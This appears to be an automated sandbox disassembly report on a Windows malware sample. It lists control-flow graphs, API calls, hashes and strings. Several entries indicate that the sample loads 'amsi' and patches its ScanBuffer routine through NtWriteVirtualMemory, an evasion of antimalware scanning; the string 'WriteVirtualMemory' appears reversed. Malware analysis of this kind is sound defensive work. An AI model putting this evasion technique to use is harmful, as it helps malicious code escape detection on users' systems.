                                  • Instruction ID: 7472d7190d13a2fcc272bc1c28f808604c7cecafab7a47dc86fae162b067357e
                                  • Opcode Fuzzy Hash: 05f0f72a2ce64c2766bc44a61e5a54731eece04dbd726b30ede74037df41df27
                                  • Instruction Fuzzy Hash: DB411B35B901099BEB01FBA4D841A9EB3FAEF98700F60E465F489A7291DA30AD01CF51

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 02E881D4: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E88244,?,?,00000000,?,02E87A86,ntdll,00000000,00000000,02E87ACB,?,?,00000000), ref: 02E88212
                                    • Part of subcall function 02E881D4: GetModuleHandleA.KERNELBASE(?), ref: 02E88226
                                    • Part of subcall function 02E8827C: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E88304,?,?,00000000,00000000,?,02E8821D,00000000,KernelBASE,00000000,00000000,02E88244), ref: 02E882C9
                                    • Part of subcall function 02E8827C: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E882CF
                                    • Part of subcall function 02E8827C: GetProcAddress.KERNEL32(?,?), ref: 02E882E1
                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E87DF4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                  • String ID: Ntdll$yromeMlautriVetirW
                                  • API String ID: 2719805696-3542721025
                                  • Opcode ID: 1b9f10d576efae02a96d08c80919f9a218d9a6bd24dd42f5f4373804ec8dc779
                                  • Instruction ID: 05760a073dffacb93782131cec40adbdf5ae3ff0335f130893fc4b5b7369a08c
                                  • Opcode Fuzzy Hash: 1b9f10d576efae02a96d08c80919f9a218d9a6bd24dd42f5f4373804ec8dc779
                                  • Instruction Fuzzy Hash: 5E012D796C0208BFEB40EFA8DC42E5AB7EEEB48700F61E454F948D7650D630AD50CB65

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 02E86D74: CLSIDFromProgID.OLE32(00000000,?,00000000,02E86DC1,?,?,?,00000000), ref: 02E86DA1
                                  • CoCreateInstance.OLE32(?,00000000,00000005,02E86EB4,00000000,00000000,02E86E33,?,00000000,02E86EA3), ref: 02E86E1F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: CreateFromInstanceProg
                                  • String ID:
                                  • API String ID: 2151042543-0
                                  • Opcode ID: 7dbce2e2f52f1c4f07fc6c2ae1b343662f987a7b1a50cd6396b419309073db8e
                                  • Instruction ID: cb3ad302a324d2bdd380704e6b65f7c20691c6d5732d5e6108bfa6fd597f3d0d
                                  • Opcode Fuzzy Hash: 7dbce2e2f52f1c4f07fc6c2ae1b343662f987a7b1a50cd6396b419309073db8e
                                  • Instruction Fuzzy Hash: A901F732684704AEE711FF64DC52C6F7BBCEB4A700B51D475F90DE2690E6308A10C960

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4755 2e71724-2e71736 4756 2e7173c-2e7174c 4755->4756 4757 2e71968-2e7196d 4755->4757 4758 2e717a4-2e717ad 4756->4758 4759 2e7174e-2e7175b 4756->4759 4760 2e71973-2e71984 4757->4760 4761 2e71a80-2e71a83 4757->4761 4758->4759 4766 2e717af-2e717bb 4758->4766 4762 2e71774-2e71780 4759->4762 4763 2e7175d-2e7176a 4759->4763 4764 2e71986-2e719a2 4760->4764 4765 2e71938-2e71945 4760->4765 4767 2e71684-2e716ad VirtualAlloc 4761->4767 4768 2e71a89-2e71a8b 4761->4768 4774 2e71782-2e71790 4762->4774 4775 2e717f0-2e717f9 4762->4775 4771 2e71794-2e717a1 4763->4771 4772 2e7176c-2e71770 4763->4772 4776 2e719a4-2e719ac 4764->4776 4777 2e719b0-2e719bf 4764->4777 4765->4764 4773 2e71947-2e7195b Sleep 4765->4773 4766->4759 4778 2e717bd-2e717c9 4766->4778 4769 2e716df-2e716e5 4767->4769 4770 2e716af-2e716dc call 2e71644 4767->4770 4770->4769 4773->4764 4780 2e7195d-2e71964 Sleep 4773->4780 4785 2e7182c-2e71836 4775->4785 4786 2e717fb-2e71808 4775->4786 4781 2e71a0c-2e71a22 4776->4781 4782 2e719c1-2e719d5 4777->4782 4783 2e719d8-2e719e0 4777->4783 4778->4759 4784 2e717cb-2e717de Sleep 4778->4784 4780->4765 4789 2e71a24-2e71a32 4781->4789 4790 2e71a3b-2e71a47 4781->4790 4782->4781 4794 2e719e2-2e719fa 4783->4794 4795 2e719fc-2e719fe call 2e715cc 4783->4795 4784->4759 4793 2e717e4-2e717eb Sleep 4784->4793 4791 2e718a8-2e718b4 4785->4791 4792 2e71838-2e71863 4785->4792 4786->4785 4787 2e7180a-2e7181e Sleep 4786->4787 4787->4785 4797 2e71820-2e71827 Sleep 4787->4797 4789->4790 4798 2e71a34 4789->4798 4801 2e71a49-2e71a5c 4790->4801 4802 2e71a68 4790->4802 4803 2e718b6-2e718c8 4791->4803 4804 2e718dc-2e718eb call 2e715cc 4791->4804 4799 2e71865-2e71873 4792->4799 4800 2e7187c-2e7188a 4792->4800 4793->4758 4805 2e71a03-2e71a0b 4794->4805 4795->4805 4797->4786 4798->4790 4799->4800 4806 2e71875 4799->4806 4807 2e7188c-2e718a6 call 2e71500 4800->4807 4808 2e718f8 4800->4808 4809 2e71a5e-2e71a63 call 2e71500 4801->4809 4810 2e71a6d-2e71a7f 4801->4810 4802->4810 4811 2e718cc-2e718da 4803->4811 4812 2e718ca 4803->4812 4815 2e718fd-2e71936 4804->4815 4818 2e718ed-2e718f7 4804->4818 4806->4800 4807->4815 4808->4815 4809->4810 4811->4815 4812->4811
                                  APIs
                                  • Sleep.KERNEL32(00000000), ref: 02E717D0
                                  • Sleep.KERNEL32(0000000A,00000000), ref: 02E717E6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 7457ff7aba56d92c588f83b27334ffe417c1fe7d6ee2dc57c22f59e3965eaf09
                                  • Instruction ID: 75df70d7d0ced00c0fc06bdd6cddfbe67190ee6a79516ff37e10fe81338c9f15
                                  • Opcode Fuzzy Hash: 7457ff7aba56d92c588f83b27334ffe417c1fe7d6ee2dc57c22f59e3965eaf09
                                  • Instruction Fuzzy Hash: C0B13372A803808BCB15CF69E880356BBE1EBC6315F19D6AEE64D8F3C5C7709591CB90

                                  Control-flow Graph

                                  APIs
                                  • LoadLibraryW.KERNEL32(amsi), ref: 02E888C9
                                    • Part of subcall function 02E8827C: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E88304,?,?,00000000,00000000,?,02E8821D,00000000,KernelBASE,00000000,00000000,02E88244), ref: 02E882C9
                                    • Part of subcall function 02E8827C: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E882CF
                                    • Part of subcall function 02E8827C: GetProcAddress.KERNEL32(?,?), ref: 02E882E1
                                    • Part of subcall function 02E87D80: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E87DF4
                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E88928
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                  • String ID: DllGetClassObject$W$amsi
                                  • API String ID: 941070894-2671292670
                                  • Opcode ID: 525c7767cf8edce06ed1b7ce3f8db8ab7b8976226492a2ee9545c7f482f237c3
                                  • Instruction ID: 3f87d7636bac5bd18679bcd733d1a23cfab97a47b6ab24fc0ccbbd7495563bb0
                                  • Opcode Fuzzy Hash: 525c7767cf8edce06ed1b7ce3f8db8ab7b8976226492a2ee9545c7f482f237c3
                                  • Instruction Fuzzy Hash: 5AF0A45008C381B9D301F3788C45F4FBACE4B62234F40DA58B1EC5A2D2D675D0048BB7

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4835 2e71a8c-2e71a9b 4836 2e71aa1-2e71aa5 4835->4836 4837 2e71b6c-2e71b6f 4835->4837 4840 2e71aa7-2e71aae 4836->4840 4841 2e71b08-2e71b11 4836->4841 4838 2e71b75-2e71b7f 4837->4838 4839 2e71c5c-2e71c60 4837->4839 4842 2e71b81-2e71b8d 4838->4842 4843 2e71b3c-2e71b49 4838->4843 4846 2e71c66-2e71c6b 4839->4846 4847 2e716e8-2e7170b call 2e71644 VirtualFree 4839->4847 4844 2e71ab0-2e71abb 4840->4844 4845 2e71adc-2e71ade 4840->4845 4841->4840 4848 2e71b13-2e71b27 Sleep 4841->4848 4850 2e71bc4-2e71bd2 4842->4850 4851 2e71b8f-2e71b92 4842->4851 4843->4842 4849 2e71b4b-2e71b5f Sleep 4843->4849 4852 2e71ac4-2e71ad9 4844->4852 4853 2e71abd-2e71ac2 4844->4853 4854 2e71af3 4845->4854 4855 2e71ae0-2e71af1 4845->4855 4866 2e71716 4847->4866 4867 2e7170d-2e71714 4847->4867 4848->4840 4857 2e71b2d-2e71b38 Sleep 4848->4857 4849->4842 4858 2e71b61-2e71b68 Sleep 4849->4858 4859 2e71b96-2e71b9a 4850->4859 4861 2e71bd4-2e71bd9 call 2e714c0 4850->4861 4851->4859 4860 2e71af6-2e71b03 4854->4860 4855->4854 4855->4860 4857->4841 4858->4843 4863 2e71bdc-2e71be9 4859->4863 4864 2e71b9c-2e71ba2 4859->4864 4860->4838 4861->4859 4863->4864 4868 2e71beb-2e71bf2 call 2e714c0 4863->4868 4870 2e71bf4-2e71bfe 4864->4870 4871 2e71ba4-2e71bc2 call 2e71500 4864->4871 4869 2e71719-2e71723 4866->4869 4867->4869 4868->4864 4874 2e71c00-2e71c28 VirtualFree 4870->4874 4875 2e71c2c-2e71c59 call 2e71560 4870->4875
                                  APIs
                                  • Sleep.KERNEL32(00000000,?,?,00000000,02E71FE4), ref: 02E71B17
                                  • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02E71FE4), ref: 02E71B31
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 3da2c8f405cb1ce38377a09ea3e6d11e433d41d219973e077ae93321d898f93d
                                  • Instruction ID: 8fbe34759c8bf7543345d5f8144bd62b4ae775a82688cf3940b797177c53362b
                                  • Opcode Fuzzy Hash: 3da2c8f405cb1ce38377a09ea3e6d11e433d41d219973e077ae93321d898f93d
                                  • Instruction Fuzzy Hash: BA51C0716803408FDB15CF68D984756BBE4AB86318F18D5AEE54CCF2C2E770D885CBA1

                                  Control-flow Graph

                                  APIs
                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E8E5F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: CheckConnectionInternet
                                  • String ID: Initialize$OpenSession$ScanBuffer
                                  • API String ID: 3847983778-3852638603
                                  • Opcode ID: 862b57f7b098c1e4441960bb520294549a2d8f96e213c94081cf7ed6329cf35d
                                  • Instruction ID: 5804c6f0eeab01b611432e3b5f05d0a77477d44d1189b0c565a9a5fc35857f14
                                  • Opcode Fuzzy Hash: 862b57f7b098c1e4441960bb520294549a2d8f96e213c94081cf7ed6329cf35d
                                  • Instruction Fuzzy Hash: 03411B35B901099FEB01FBA4D841A9EB3FAEF98700F60E465F489A7291DA30AD01CF51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5014 2e7e36c-2e7e378 5015 2e7e387-2e7e38c 5014->5015 5016 2e7e37a-2e7e380 VariantClear call 2e7e038 5014->5016 5018 2e7e38e-2e7e39b call 2e744dc 5015->5018 5019 2e7e39d-2e7e3a2 5015->5019 5020 2e7e385 5016->5020 5026 2e7e3e3-2e7e3e6 5018->5026 5022 2e7e3a4-2e7e3ac 5019->5022 5023 2e7e3ae-2e7e3b3 5019->5023 5020->5026 5022->5026 5024 2e7e3b5-2e7e3bc call 2e7e1f0 5023->5024 5025 2e7e3be-2e7e3c9 call 2e82eac 5023->5025 5024->5026 5033 2e7e3d7-2e7e3de VariantClear VariantInit 5025->5033 5034 2e7e3cb-2e7e3d5 5025->5034 5033->5026 5034->5026
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID:
                                  • API String ID: 1473721057-0
                                  • Opcode ID: 051dfa4cbc8c88f5a2495e2a4dd16aa04fc1b6c26bd27ada772dd821cb850051
                                  • Instruction ID: 24729fb1a51bb348a7ca29c77707cebb510629792208d7faec3e0120fab41488
                                  • Opcode Fuzzy Hash: 051dfa4cbc8c88f5a2495e2a4dd16aa04fc1b6c26bd27ada772dd821cb850051
                                  • Instruction Fuzzy Hash: 02F0F6207C4110A7D7207B38CCC46AD279AAF44708B58F4F6F586AB145CB38CC85CBA2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5036 2e870e4-2e8712e call 2e74f40 5039 2e87130-2e87142 call 2e7b050 call 2e73e98 5036->5039 5040 2e87147-2e87149 5036->5040 5039->5040 5042 2e8714f-2e87163 5040->5042 5043 2e87310-2e87337 5040->5043 5047 2e87165-2e8717f 5042->5047 5045 2e87339-2e87348 5043->5045 5046 2e87361-2e87364 5043->5046 5049 2e8734a 5045->5049 5050 2e8734f-2e8735f 5045->5050 5051 2e87375-2e87391 5046->5051 5052 2e87366-2e87368 5046->5052 5053 2e87199-2e8719d 5047->5053 5054 2e87181-2e87194 5047->5054 5049->5050 5050->5051 5064 2e87396-2e87398 5051->5064 5052->5051 5055 2e8736a-2e8736e 5052->5055 5057 2e8719f-2e871ae 5053->5057 5058 2e87213-2e87215 5053->5058 5056 2e87307-2e8730a 5054->5056 5055->5051 5061 2e87370 5055->5061 5056->5043 5056->5047 5062 2e871e0-2e87208 call 2e753b0 5057->5062 5063 2e871b0-2e871de call 2e753b0 5057->5063 5059 2e8725c-2e87260 5058->5059 5060 2e87217-2e8721b 5058->5060 5067 2e87262-2e8726a 5059->5067 5068 2e872d5-2e872ec 5059->5068 5065 2e8721d-2e87227 5060->5065 5066 2e8723f-2e87257 5060->5066 5061->5051 5084 2e8720b-2e8720e 5062->5084 5063->5084 5070 2e8739a-2e8739d call 2e876bc 5064->5070 5071 2e873a2-2e873a7 5064->5071 5065->5066 5076 2e87229-2e8723a call 2e7eae0 5065->5076 5077 2e87303 5066->5077 5078 2e872aa-2e872d3 5067->5078 5079 2e8726c-2e872a8 call 2e753b0 5067->5079 5068->5077 5081 2e872ee-2e872f2 5068->5081 5070->5071 5074 2e873a9-2e873b6 5071->5074 5075 2e873c5-2e873d7 5071->5075 5085 2e873b8-2e873bc call 2e7538c 5074->5085 5086 2e873c1-2e873c3 5074->5086 5091 2e873d9-2e873e9 SysFreeString 5075->5091 5092 2e873eb 5075->5092 5076->5066 5077->5056 5078->5077 5079->5077 5081->5077 5083 2e872f4-2e87300 5081->5083 5083->5077 5084->5077 5085->5086 5086->5074 5086->5075 5091->5091 5091->5092
                                  APIs
                                  • SysFreeString.OLEAUT32(?), ref: 02E873E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: FreeString
                                  • String ID: H
                                  • API String ID: 3341692771-2852464175
                                  • Opcode ID: 38d1b92e62e265768bffffd63d642b142764ab1ab8d5cfb0fd1680aa390f71ac
                                  • Instruction ID: d4f5c30bb87b5641b2839ea4a71ef77e163cb41c0662eeddb281c4d3177ac330
                                  • Opcode Fuzzy Hash: 38d1b92e62e265768bffffd63d642b142764ab1ab8d5cfb0fd1680aa390f71ac
                                  • Instruction Fuzzy Hash: 73B1F278A816089FDB15DF99D880A9DFBF2FF89314F24D169E849AB320D730A845CF51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5094 2e7e768-2e7e775 5095 2e7e777-2e7e779 call 2e7e36c 5094->5095 5096 2e7e77e-2e7e785 5094->5096 5095->5096 5098 2e7e787-2e7e78e VariantCopy call 2e7e038 5096->5098 5099 2e7e795-2e7e79a 5096->5099 5103 2e7e793 5098->5103 5101 2e7e7b3-2e7e7b8 5099->5101 5102 2e7e79c-2e7e7b1 call 2e74530 5099->5102 5105 2e7e7cd-2e7e7d2 5101->5105 5106 2e7e7ba-2e7e7cb 5101->5106 5107 2e7e80e-2e7e812 5102->5107 5103->5107 5109 2e7e7e4-2e7e7ef call 2e82eac 5105->5109 5110 2e7e7d4-2e7e7e2 call 2e7e594 5105->5110 5106->5107 5116 2e7e802-2e7e809 VariantCopy call 2e7e038 5109->5116 5117 2e7e7f1-2e7e800 5109->5117 5110->5107 5116->5107 5117->5107
                                  APIs
                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 02E7E789
                                    • Part of subcall function 02E7E36C: VariantClear.OLEAUT32(?), ref: 02E7E37B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Variant$ClearCopy
                                  • String ID:
                                  • API String ID: 274517740-0
                                  • Opcode ID: 72a175295789a6b5dedc885391dad22bb6499748787ba2df5a7db401d28ff194
                                  • Instruction ID: 7f28d315e4de915ade8601f65df17073a6fc2cf6fbc134e76726b8f2fe0bfc6d
                                  • Opcode Fuzzy Hash: 72a175295789a6b5dedc885391dad22bb6499748787ba2df5a7db401d28ff194
                                  • Instruction Fuzzy Hash: F711822178021487EB20AB29D9C46A777DAAF85754B1CF4EBF54ACF259DB30CC40CB62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5120 2e7e404-2e7e414 5121 2e7e416-2e7e504 call 2e7e404 5120->5121 5122 2e7e433-2e7e437 5120->5122 5124 2e7e440-2e7e44c VariantInit 5122->5124 5125 2e7e439-2e7e43e 5122->5125 5127 2e7e44f-2e7e468 5124->5127 5125->5127 5129 2e7e46a 5127->5129 5130 2e7e478-2e7e47d 5127->5130 5131 2e7e484-2e7e48b 5129->5131 5133 2e7e46c-2e7e46f 5129->5133 5130->5131 5132 2e7e47f-2e7e482 5130->5132 5135 2e7e4cf-2e7e4e0 5131->5135 5136 2e7e48d-2e7e49a call 2e8754d 5131->5136 5132->5131 5134 2e7e4a5-2e7e4b1 call 2e82eac 5132->5134 5133->5131 5137 2e7e471-2e7e474 5133->5137 5145 2e7e4b3-2e7e4c8 5134->5145 5146 2e7e4ca call 2e7dca0 5134->5146 5143 2e7e4f7 5135->5143 5144 2e7e4e2-2e7e4ea call 2e7e814 5135->5144 5141 2e7e4a0-2e7e4a3 5136->5141 5137->5131 5140 2e7e476 5137->5140 5140->5134 5141->5135 5148 2e7e4ef-2e7e4f2 call 2e7e3e8 5144->5148 5145->5135 5146->5135 5148->5143
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: InitVariant
                                  • String ID:
                                  • API String ID: 1927566239-0
                                  • Opcode ID: 47d3a525a343be44c43f173bb682543f51eb446db2163e78964601deb8e6301f
                                  • Instruction ID: ca6a8ac8f44cb4bcb00fd068523acb4e37b0d960a81581c91febf7c8448695ff
                                  • Opcode Fuzzy Hash: 47d3a525a343be44c43f173bb682543f51eb446db2163e78964601deb8e6301f
                                  • Instruction Fuzzy Hash: 1C315271A80109AFEB14DF98C885AAA77F8EB0D314F4C94B5FA09D7150F734D950CB61
                                  APIs
                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02E86DC1,?,?,?,00000000), ref: 02E86DA1
                                    • Part of subcall function 02E74C60: SysFreeString.OLEAUT32(02E8F4A0), ref: 02E74C6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: FreeFromProgString
                                  • String ID:
                                  • API String ID: 4225568880-0
                                  • Opcode ID: 3139dd6cd018d157f67b371234db3a3ffcce112109c4dc24dbf223c904089293
                                  • Instruction ID: f5a1d03b6927bdd8a3337be3c7792ab125f6f09aab1fbc7a1644545514cd7f64
                                  • Opcode Fuzzy Hash: 3139dd6cd018d157f67b371234db3a3ffcce112109c4dc24dbf223c904089293
                                  • Instruction Fuzzy Hash: BBE06531684218BBE711FB62DC51D5E77ADDF8B710F51E471F54493690EA746D048860
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(02E70000,?,00000105), ref: 02E75886
                                    • Part of subcall function 02E75ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E70000,02E9E790), ref: 02E75AE8
                                    • Part of subcall function 02E75ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E70000,02E9E790), ref: 02E75B06
                                    • Part of subcall function 02E75ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E70000,02E9E790), ref: 02E75B24
                                    • Part of subcall function 02E75ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E75B42
